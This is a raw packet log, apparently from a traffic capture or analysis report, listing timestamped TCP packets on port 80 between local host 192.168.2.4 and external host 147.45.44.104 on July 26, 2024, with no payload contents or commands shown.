Jul 26, 2024 18:56:48.651123047 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.651132107 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.651135921 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.651144981 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.651149035 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.651160955 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.651175976 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.651190042 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.652127981 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.652141094 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.652151108 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.652163982 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.652168989 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.652180910 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.652184963 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.652194977 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.652199030 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.652208090 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.652215004 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.652220964 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.652226925 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.652235031 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.652242899 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.652246952 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.652256966 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.652260065 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.652271986 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.652273893 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.652287960 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.652293921 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.652299881 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.652309895 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.652323961 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.652338028 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.653068066 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.653081894 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.653091908 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.653104067 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.653110981 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.653115988 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.653124094 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.653130054 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.653140068 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.653141975 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.653153896 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.653155088 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.653166056 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.653168917 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.653178930 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.653188944 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.653191090 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.653202057 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.653204918 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.653218031 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.653218031 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.653230906 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.653239012 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.653244019 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.653250933 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.653268099 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.653280973 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.653754950 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.653768063 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.653778076 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.653789997 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.653793097 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.653801918 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.653806925 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.653815985 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.653825045 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.653826952 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.653839111 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.653852940 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.654058933 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.654071093 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.654084921 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.654095888 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.654098034 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.654109001 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.654110909 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.654122114 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.654128075 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.654140949 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.654155970 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.654197931 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.654211044 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.654222012 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.654232979 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.654232979 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.654244900 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.654247046 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.654258013 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.654263020 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.654272079 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.654278040 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.654285908 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.654298067 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.654298067 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.654309988 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.654310942 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.654323101 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.654325008 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.654350996 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.654361963 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.655008078 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.655020952 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.655033112 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.655044079 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.655047894 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.655056000 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.655064106 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.655069113 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.655076981 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.655085087 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.655092001 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.655112028 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.655121088 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.664509058 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.664606094 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.729681015 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.729701042 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.729712963 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.729787111 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.729790926 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.729804993 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.729808092 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.729819059 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.729827881 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.729831934 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.729842901 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.729859114 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.729871988 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.730204105 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.730216980 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.730228901 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.730240107 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.730242014 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.730253935 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.730257988 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.730267048 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.730269909 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.730281115 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.730290890 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.730293036 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.730302095 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.730308056 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.730317116 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.730330944 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.730346918 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.730649948 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.730662107 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.730674028 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.730691910 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.730694056 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.730705976 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.730715036 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.730719090 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.730729103 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.730731964 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.730742931 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.730743885 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.730758905 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.730761051 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.730771065 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.730772018 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.730784893 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.730792999 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.730797052 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.730807066 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.730811119 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.730820894 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.730832100 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.730844021 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.730849981 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.730879068 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.731606007 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.731618881 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.731631994 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.731645107 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.731652975 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.731657028 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.731669903 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.731673002 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.731683969 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.731688023 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.731698990 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.731703043 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.731712103 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.731719971 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.731724024 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.731733084 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.731736898 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.731746912 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.731755972 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.731762886 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.731770039 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.731780052 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.731782913 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.731792927 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.731806993 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.731820107 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.732440948 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.732454062 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.732465982 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.732476950 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.732500076 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.732511044 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.732511044 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.732511997 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.732522011 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.732525110 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.732539892 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.732543945 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.732554913 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.732557058 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.732566118 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.732568979 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.732580900 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.732582092 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.732593060 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.732594013 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.732604027 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.732609987 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.732618093 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.732629061 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.732629061 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.732640982 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.732645035 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.732655048 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.732669115 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.732682943 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.733383894 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.733397007 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.733411074 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.733422041 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.733434916 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.733447075 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.733453035 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.733459949 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.733472109 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.733472109 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.733484030 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.733486891 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.733499050 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.733504057 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.733511925 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.733519077 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.733527899 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.733534098 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.733540058 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.733547926 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.733552933 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.733562946 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.733566999 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.733577967 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.733583927 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.733592987 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.733608007 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.733620882 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.734306097 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.734319925 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.734330893 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.734342098 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.734354019 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.734358072 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.734365940 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.734375000 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.734379053 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.734390974 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.734399080 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.734402895 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.734416008 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.734416008 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.734430075 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.734430075 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.734445095 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.734447002 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.734457970 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.734460115 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.734471083 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.734474897 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.734483957 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.734493017 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.734504938 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.734520912 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.735286951 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.735301971 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.735312939 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.735325098 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.735335112 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.735337019 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.735349894 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.735351086 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.735362053 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.735373974 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.735384941 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.735394955 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.735394955 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.735404015 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.735409975 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.735420942 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.735421896 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.735433102 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.735435963 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.735445976 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.735457897 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.735469103 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.735471010 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.735481024 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.735502005 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.735529900 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.735531092 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.827349901 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.827477932 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.827486992 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.827493906 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.827498913 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.827505112 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.827511072 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.827629089 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.827658892 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.827670097 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.827678919 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.827687979 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.827697992 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.827707052 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.827708960 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.827713013 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.827723026 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.827723026 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.827734947 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.827743053 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.827756882 CEST	49757	80	192.168.2.4	147.45.44.104
